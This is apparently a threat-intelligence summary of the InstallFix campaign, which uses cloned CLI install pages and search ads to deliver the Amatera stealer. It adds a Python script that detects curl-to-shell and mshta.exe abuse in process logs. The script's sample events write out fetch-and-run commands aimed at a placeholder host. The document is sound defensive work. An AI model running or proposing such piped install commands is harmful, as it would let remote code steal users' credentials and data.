Threat actors are using InstallFix, a ClickFix variant, to trick users into running malicious install commands from cloned CLI pages and promoted search ads, delivering the Amatera information stealer. The attacks exploit curl-to-bash habits, legitimate hosting platforms, and sponsored search results to evade detection, so users should rely on official download sources and avoid promoted search results. #Amatera #ClaudeCode
Key points
- InstallFix clones legitimate CLI installation pages (e.g., Claude Code) to present malicious install commands.
- Attackers promote fake install pages via malvertising and AI-enhanced search results on Google and Bing.
- macOS commands deliver base64-encoded payloads while Windows commands abuse mshta.exe and conhost.exe to execute Amatera.
- The payload, Amatera stealer, exfiltrates credentials, cookies, session tokens, cryptocurrency wallets, and system information.
- Malicious pages are hosted on legitimate platforms (Squarespace, Cloudflare Pages, GitHub, Tencent EdgeOne), so users should use official sites, bookmark downloads, and avoid sponsored search results.
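The points above describe the command patterns InstallFix relies on: a one-liner that pipes curl into a shell, a base64-decoded payload fed to a shell on macOS, and mshta.exe run under conhost.exe on Windows. The following is an added example, not code from the original post or from any vendor, showing how a defender could flag those patterns in endpoint process-creation telemetry. The event records, hostnames and URLs (example.invalid) are constructed samples, not indicators from the campaign, and the rule names and `ProcessEvent` fields are assumptions about the log schema.

```python
"""Heuristic triage of process-creation events for InstallFix-style install commands.

Added example, not from the original post. Flags the patterns the summary names:
curl/wget piped into a shell, base64 decoding piped into a shell (macOS), mshta.exe
given a remote URL, and mshta.exe launched under conhost.exe (Windows).
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    """Minimal process-creation record (assumed schema, not a real EDR format)."""
    host: str
    os: str        # "macos", "linux" or "windows"
    parent: str    # parent process image name
    image: str     # created process image name
    cmdline: str   # full command line


# Constructed sample events; example.invalid is a reserved placeholder domain.
SAMPLE_EVENTS = [
    ProcessEvent("mac-01", "macos", "Terminal", "/bin/bash",
                 "curl -fsSL https://example.invalid/install.sh | bash"),
    ProcessEvent("mac-02", "macos", "Terminal", "/bin/sh",
                 "echo aGVsbG8K | base64 -D | sh"),
    ProcessEvent("mac-03", "macos", "Terminal", "/usr/bin/curl",
                 "curl -fsSL https://example.invalid/install.sh -o install.sh"),
    ProcessEvent("win-01", "windows", "cmd.exe", "mshta.exe",
                 "mshta.exe https://example.invalid/setup.hta"),
    ProcessEvent("win-02", "windows", "conhost.exe", "mshta.exe",
                 "mshta.exe C:\\Users\\Public\\x.hta"),
    ProcessEvent("win-03", "windows", "explorer.exe", "notepad.exe",
                 "notepad.exe readme.txt"),
]

# Command-line rules: (rule name, pattern, operating systems it applies to).
# The shell alternation accepts sh, bash and zsh, optionally under sudo.
RULES = [
    ("curl_pipe_shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
     {"macos", "linux"}),
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(-d|-D|--decode)[^|]*\|\s*(sudo\s+)?(ba|z|)sh\b"),
     {"macos", "linux"}),
    ("mshta_remote_url",
     re.compile(r"\bmshta(\.exe)?\b.*https?://", re.IGNORECASE),
     {"windows"}),
]


def evaluate(event: ProcessEvent) -> list[str]:
    """Return the names of all rules an event matches (empty list if benign)."""
    hits = [name for name, pattern, oses in RULES
            if event.os in oses and pattern.search(event.cmdline)]
    # Parent/child check: the summary pairs conhost.exe with mshta.exe, so flag
    # mshta.exe whose direct parent is conhost.exe regardless of its arguments.
    if (event.os == "windows"
            and event.image.lower() == "mshta.exe"
            and event.parent.lower() == "conhost.exe"):
        hits.append("mshta_from_conhost")
    return hits


def triage(events: list[ProcessEvent]) -> dict[str, list[str]]:
    """Map each host with at least one hit to the rules it triggered."""
    findings = {}
    for event in events:
        hits = evaluate(event)
        if hits:
            findings[event.host] = hits
    return findings


if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(hits)}")
```

The download-only curl on mac-03 is deliberately not flagged: fetching a script to disk for inspection is the behaviour the summary recommends over piping it straight into a shell, and a rule that fires on every curl would bury the signal. Tune the shell alternation and the parent/child pair to the telemetry your EDR actually emits.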